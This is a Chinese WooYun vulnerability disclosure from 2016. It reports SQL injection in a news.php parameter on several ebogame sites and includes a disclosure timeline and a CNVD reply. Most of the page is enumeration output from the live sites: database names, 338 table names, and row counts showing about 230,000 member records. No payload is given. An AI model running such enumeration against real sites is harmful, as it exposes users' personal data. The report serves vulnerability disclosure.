当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0208414

漏洞标题:游戏安全之ebogame多处SQL注入(ROOT/可Union/涉及200W+用户信息)

相关厂商:ebogame

漏洞作者: Exploit DB

提交时间:2016-05-14 11:30

修复时间:2016-07-02 13:50

公开时间:2016-07-02 13:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-14: 细节已通知厂商并且等待厂商处理中
2016-05-18: 厂商已经确认,细节仅向厂商公开
2016-05-28: 细节向核心白帽子及相关领域专家公开
2016-06-07: 细节向普通白帽子公开
2016-06-17: 细节向实习白帽子公开
2016-07-02: 细节向公众公开

简要描述:

RT.

详细说明:

不知道能不能首显...这个月打算冲榜的...这货在我的待认领里待好多天了...这次就让他变成待确认好不好撒QAQ
同一处参数 不同的网站 

http://**.**.**.**/news.php?contentid=2369


http://**.**.**.**/news.php?contentid=2436


http://**.**.**.**/news.php?contentid=2370


http://**.**.**.**/news.php?contentid=2243


QQ截图20160514000613.png


available databases [13]:
[*] 5ebo
[*] 5ebo_bbs
[*] 5ebo_oa
[*] 5ebo_ucenter
[*] 5ebo_www
[*] 5ebo_www_test
[*] eboedu
[*] ebogame
[*] ebogame_1
[*] information_schema
[*] my
[*] mysql
[*] test
Database: ebogame
[338 tables]
+-----------------------------------+
| api_send_mail                     |
| bbs_actlogs                       |
| bbs_apclog                        |
| bbs_beg                           |
| bbs_bmbcode                       |
| bbs_contacts                      |
| bbs_emoticons                     |
| bbs_favorites                     |
| bbs_forumdata                     |
| bbs_gueststat                     |
| bbs_invite                        |
| bbs_lastest                       |
| bbs_levels                        |
| bbs_onlinestat                    |
| bbs_polls                         |
| bbs_posts                         |
| bbs_potlog                        |
| bbs_primsg                        |
| bbs_schedule                      |
| bbs_search                        |
| bbs_shareforum                    |
| bbs_tags                          |
| bbs_threads                       |
| bbs_ugoptlist                     |
| bbs_usergroup                     |
| bbs_userlist                      |
| ebogame_activation                |
| ebogame_advertising               |
| ebogame_advertising_click         |
| ebogame_bbs                       |
| ebogame_bbs_section               |
| ebogame_category                  |
| ebogame_charge                    |
| ebogame_charge_20160118           |
| ebogame_charge_bf                 |
| ebogame_charge_copy               |
| ebogame_charge_heepay             |
| ebogame_content                   |
| ebogame_extension                 |
| ebogame_extension_member          |
| ebogame_extension_percent         |
| ebogame_extension_settlemen       |
| ebogame_extension_settlemen_once  |
| ebogame_game_areas                |
| ebogame_game_code                 |
| ebogame_game_gift_code            |
| ebogame_game_gift_code_           |
| ebogame_game_gift_code_17173      |
| ebogame_game_gift_info_           |
| ebogame_game_gift_info_17173      |
| ebogame_games                     |
| ebogame_integral                  |
| ebogame_member                    |
| ebogame_member_char               |
| ebogame_member_info               |
| ebogame_member_integral           |
| ebogame_member_login              |
| ebogame_member_price              |
| ebogame_member_serv               |
| ebogame_news                      |
| ebogame_pictures                  |
| ebogame_price                     |
| ebogame_question_reply            |
| ebogame_questions                 |
| pre_common_admincp_cmenu          |
| pre_common_admincp_group          |
| pre_common_admincp_member         |
| pre_common_admincp_perm           |
| pre_common_admincp_session        |
| pre_common_admingroup             |
| pre_common_adminnote              |
| pre_common_advertisement          |
| pre_common_advertisement_custom   |
| pre_common_banned                 |
| pre_common_block                  |
| pre_common_block_favorite         |
| pre_common_block_item             |
| pre_common_block_item_data        |
| pre_common_block_permission       |
| pre_common_block_pic              |
| pre_common_block_style            |
| pre_common_block_xml              |
| pre_common_cache                  |
| pre_common_card                   |
| pre_common_card_log               |
| pre_common_card_type              |
| pre_common_connect_guest          |
| pre_common_credit_log             |
| pre_common_credit_rule            |
| pre_common_credit_rule_log        |
| pre_common_credit_rule_log_field  |
| pre_common_cron                   |
| pre_common_devicetoken            |
| pre_common_district               |
| pre_common_diy_data               |
| pre_common_domain                 |
| pre_common_failedlogin            |
| pre_common_friendlink             |
| pre_common_grouppm                |
| pre_common_invite                 |
| pre_common_magic                  |
| pre_common_magiclog               |
| pre_common_mailcron               |
| pre_common_mailqueue              |
| pre_common_member                 |
| pre_common_member_action_log      |
| pre_common_member_connect         |
| pre_common_member_count           |
| pre_common_member_crime           |
| pre_common_member_field_forum     |
| pre_common_member_field_home      |
| pre_common_member_grouppm         |
| pre_common_member_log             |
| pre_common_member_magic           |
| pre_common_member_medal           |
| pre_common_member_profile         |
| pre_common_member_profile_setting |
| pre_common_member_security        |
| pre_common_member_stat_field      |
| pre_common_member_status          |
| pre_common_member_validate        |
| pre_common_member_verify          |
| pre_common_member_verify_info     |
| pre_common_myapp                  |
| pre_common_myinvite               |
| pre_common_mytask                 |
| pre_common_nav                    |
| pre_common_onlinetime             |
| pre_common_patch                  |
| pre_common_plugin                 |
| pre_common_pluginvar              |
| pre_common_process                |
| pre_common_regip                  |
| pre_common_relatedlink            |
| pre_common_report                 |
| pre_common_searchindex            |
| pre_common_secquestion            |
| pre_common_session                |
| pre_common_setting                |
| pre_common_smiley                 |
| pre_common_sphinxcounter          |
| pre_common_stat                   |
| pre_common_statuser               |
| pre_common_style                  |
| pre_common_stylevar               |
| pre_common_syscache               |
| pre_common_tag                    |
| pre_common_tagitem                |
| pre_common_task                   |
| pre_common_taskvar                |
| pre_common_template               |
| pre_common_template_block         |
| pre_common_template_permission    |
| pre_common_uin_black              |
| pre_common_usergroup              |
| pre_common_usergroup_field        |
| pre_common_word                   |
| pre_common_word_type              |
| pre_connect_disktask              |
| pre_connect_feedlog               |
| pre_connect_memberbindlog         |
| pre_connect_postfeedlog           |
| pre_connect_tthreadlog            |
| pre_forum_access                  |
| pre_forum_activity                |
| pre_forum_activityapply           |
| pre_forum_announcement            |
| pre_forum_attachment              |
| pre_forum_attachment_0            |
| pre_forum_attachment_1            |
| pre_forum_attachment_2            |
| pre_forum_attachment_3            |
| pre_forum_attachment_4            |
| pre_forum_attachment_5            |
| pre_forum_attachment_6            |
| pre_forum_attachment_7            |
| pre_forum_attachment_8            |
| pre_forum_attachment_9            |
| pre_forum_attachment_exif         |
| pre_forum_attachment_unused       |
| pre_forum_attachtype              |
| pre_forum_bbcode                  |
| pre_forum_collection              |
| pre_forum_collectioncomment       |
| pre_forum_collectionfollow        |
| pre_forum_collectioninvite        |
| pre_forum_collectionrelated       |
| pre_forum_collectionteamworker    |
| pre_forum_collectionthread        |
| pre_forum_creditslog              |
| pre_forum_debate                  |
| pre_forum_debatepost              |
| pre_forum_faq                     |
| pre_forum_forum                   |
| pre_forum_forum_threadtable       |
| pre_forum_forumfield              |
| pre_forum_forumrecommend          |
| pre_forum_groupcreditslog         |
| pre_forum_groupfield              |
| pre_forum_groupinvite             |
| pre_forum_grouplevel              |
| pre_forum_groupuser               |
| pre_forum_imagetype               |
| pre_forum_medal                   |
| pre_forum_medallog                |
| pre_forum_memberrecommend         |
| pre_forum_moderator               |
| pre_forum_modwork                 |
| pre_forum_onlinelist              |
| pre_forum_order                   |
| pre_forum_poll                    |
| pre_forum_polloption              |
| pre_forum_pollvoter               |
| pre_forum_post                    |
| pre_forum_post_location           |
| pre_forum_post_moderate           |
| pre_forum_post_tableid            |
| pre_forum_postcache               |
| pre_forum_postcomment             |
| pre_forum_postlog                 |
| pre_forum_poststick               |
| pre_forum_promotion               |
| pre_forum_ratelog                 |
| pre_forum_relatedthread           |
| pre_forum_replycredit             |
| pre_forum_rsscache                |
| pre_forum_spacecache              |
| pre_forum_statlog                 |
| pre_forum_thread                  |
| pre_forum_thread_moderate         |
| pre_forum_threadaddviews          |
| pre_forum_threadclass             |
| pre_forum_threadclosed            |
| pre_forum_threaddisablepos        |
| pre_forum_threadimage             |
| pre_forum_threadlog               |
| pre_forum_threadmod               |
| pre_forum_threadpartake           |
| pre_forum_threadpreview           |
| pre_forum_threadrush              |
| pre_forum_threadtype              |
| pre_forum_trade                   |
| pre_forum_tradecomment            |
| pre_forum_tradelog                |
| pre_forum_typeoption              |
| pre_forum_typeoptionvar           |
| pre_forum_typevar                 |
| pre_forum_warning                 |
| pre_home_album                    |
| pre_home_album_category           |
| pre_home_appcreditlog             |
| pre_home_blacklist                |
| pre_home_blog                     |
| pre_home_blog_category            |
| pre_home_blog_moderate            |
| pre_home_blogfield                |
| pre_home_class                    |
| pre_home_click                    |
| pre_home_clickuser                |
| pre_home_comment                  |
| pre_home_comment_moderate         |
| pre_home_docomment                |
| pre_home_doing                    |
| pre_home_doing_moderate           |
| pre_home_favorite                 |
| pre_home_feed                     |
| pre_home_feed_app                 |
| pre_home_follow                   |
| pre_home_follow_feed              |
| pre_home_follow_feed_archiver     |
| pre_home_friend                   |
| pre_home_friend_request           |
| pre_home_friendlog                |
| pre_home_notification             |
| pre_home_pic                      |
| pre_home_pic_moderate             |
| pre_home_picfield                 |
| pre_home_poke                     |
| pre_home_pokearchive              |
| pre_home_share                    |
| pre_home_share_moderate           |
| pre_home_show                     |
| pre_home_specialuser              |
| pre_home_userapp                  |
| pre_home_userappfield             |
| pre_home_visitor                  |
| pre_mobile_setting                |
| pre_portal_article_content        |
| pre_portal_article_count          |
| pre_portal_article_moderate       |
| pre_portal_article_related        |
| pre_portal_article_title          |
| pre_portal_article_trash          |
| pre_portal_attachment             |
| pre_portal_category               |
| pre_portal_category_permission    |
| pre_portal_comment                |
| pre_portal_comment_moderate       |
| pre_portal_rsscache               |
| pre_portal_topic                  |
| pre_portal_topic_pic              |
| pre_security_evilpost             |
| pre_security_eviluser             |
| pre_security_failedlog            |
| pre_ucenter_admins                |
| pre_ucenter_applications          |
| pre_ucenter_badwords              |
| pre_ucenter_domains               |
| pre_ucenter_failedlogins          |
| pre_ucenter_feeds                 |
| pre_ucenter_friends               |
| pre_ucenter_mailqueue             |
| pre_ucenter_memberfields          |
| pre_ucenter_members               |
| pre_ucenter_mergemembers          |
| pre_ucenter_newpm                 |
| pre_ucenter_notelist              |
| pre_ucenter_pm_indexes            |
| pre_ucenter_pm_lists              |
| pre_ucenter_pm_members            |
| pre_ucenter_pm_messages_0         |
| pre_ucenter_pm_messages_1         |
| pre_ucenter_pm_messages_2         |
| pre_ucenter_pm_messages_3         |
| pre_ucenter_pm_messages_4         |
| pre_ucenter_pm_messages_5         |
| pre_ucenter_pm_messages_6         |
| pre_ucenter_pm_messages_7         |
| pre_ucenter_pm_messages_8         |
| pre_ucenter_pm_messages_9         |
| pre_ucenter_protectedmembers      |
| pre_ucenter_settings              |
| pre_ucenter_sqlcache              |
| pre_ucenter_tags                  |
| pre_ucenter_vars                  |
| sglj_charge                       |
| sglj_coin                         |
| sglj_extension                    |
+-----------------------------------+


QQ截图20160514000613.png


有几个几十万的 由于时间原因 只跑了一个

Database: 5ebo_www
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| v9_sso_members             | 230299  |
| v9_member                  | 230205  |
| v9_sso_messagequeue        | 145306  |
| v9_found_pass_view         | 142519  |
| v9_member_detail           | 142519  |
| v9_game_code               | 105925  |
| v9_user_code_view          | 90917   |
| v9_activity_role_level     | 76843   |
| v9_media_page_detail       | 32460   |
| v9_log                     | 19718   |
| v9_pay_account             | 8811    |
| v9_media_bar_ip_library    | 6712    |
| v9_pay_spend               | 6494    |
| v9_dl_reg_return_view      | 5057    |
| v9_linkage                 | 3284    |
| v9_media_page_total_detail | 1421    |
| v9_attachment              | 962     |
| v9_attachment_index        | 853     |
| v9_keyword_data            | 560     |
| v9_menu                    | 358     |
| v9_category_priv           | 354     |
| v9_search                  | 294     |
| v9_admin_role_priv         | 280     |
| media_access               | 272     |
| v9_hits                    | 268     |
| v9_news_dl                 | 246     |
| v9_news_dl_data            | 246     |
| v9_keyword                 | 244     |
| v9_model_field             | 232     |
| v9_game_time_view          | 155     |
| v9_pay_spend_total         | 140     |
| v9_media_yy_overall_data   | 124     |
| media_node                 | 123     |
| v9_game_login_view         | 107     |
| v9_member_login            | 107     |
| v9_member_total            | 77      |
| v9_pay_statistics          | 73      |
| v9_category                | 56      |
| v9_media_yy_main_date      | 56      |
| v9_cache                   | 36      |
| media_role_user            | 31      |
| v9_media_page              | 29      |
| v9_module                  | 29      |
| v9_media                   | 26      |
| v9_media_partners          | 26      |
| v9_poster_201404           | 21      |
| v9_news                    | 20      |
| v9_news_data               | 20      |
| media_user                 | 19      |
| v9_dlbbs_news              | 15      |
| v9_dlbbs_news_data         | 15      |
| v9_dl_patch                | 14      |
| v9_dl_patch_data           | 14      |
| v9_game_card               | 14      |
| media_role                 | 12      |
| v9_media_anomalydata       | 12      |
| v9_position                | 12      |
| v9_game_card_view          | 10      |
| v9_poster                  | 10      |
| v9_poster_space            | 10      |
| v9_model                   | 9       |
| v9_admin_role              | 8       |
| v9_position_data           | 8       |
| v9_urlrule                 | 8       |
| v9_all_game_view           | 7       |
| v9_member_group            | 7       |
| v9_type                    | 7       |
| v9_admin                   | 5       |
| v9_games                   | 5       |
| v9_poster_201403           | 5       |
| v9_sso_settings            | 5       |
| v9_poster_201405           | 4       |
| v9_workflow                | 4       |
| v9_game_areas              | 3       |
| v9_game_areas_view         | 3       |
| v9_member_menu             | 3       |
| v9_pay_payment             | 3       |
| v9_site                    | 3       |
| v9_favorite                | 2       |
| v9_link                    | 2       |
| v9_media_ad                | 2       |
| v9_comment_setting         | 1       |
| v9_comment_table           | 1       |
| v9_extend_setting          | 1       |
| v9_media_bar               | 1       |
| v9_media_setting           | 1       |
| v9_message                 | 1       |
| v9_sso_admin               | 1       |
| v9_sso_applications        | 1       |
| v9_wap                     | 1       |
+----------------------------+---------+


漏洞证明:

修复方案:

版权声明:转载请注明来源 Exploit DB@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-18 13:45

厂商回复:

CNVD未直接复现所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无